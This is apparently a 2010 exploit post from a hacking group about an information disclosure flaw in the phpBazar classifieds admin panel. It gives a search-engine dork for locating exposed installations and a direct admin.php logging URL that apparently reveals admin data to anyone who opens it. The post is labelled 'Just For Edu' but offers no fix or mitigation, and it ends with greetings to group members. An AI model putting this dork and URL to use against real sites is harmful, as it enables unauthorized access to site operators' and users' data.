phpBazar Admin - Information Disclosure
=====================================
phpBazar admin information discloser Vulnerability
=====================================
Author :: Net_Spy
Group :: Aras cyber Army
Email :: [email protected]
Discover :: 1 july 2010
Critical Lvl :: M
Published :: 22 july 2010
Vendor :: http://www.smartisoft.com/
---------------------------------------------------------------------------
~~~~~~~~~
Dork :: intitle: phpBazar-AdminPanel
~~~~~~~~~~~~~~~~~~
demo :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
~~~~~~~~~~~~~~~~~~~~~~~~~
Example Just For Edu :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
All aras cyber amry members
+++++++++++++++++++++++++++++++++++++++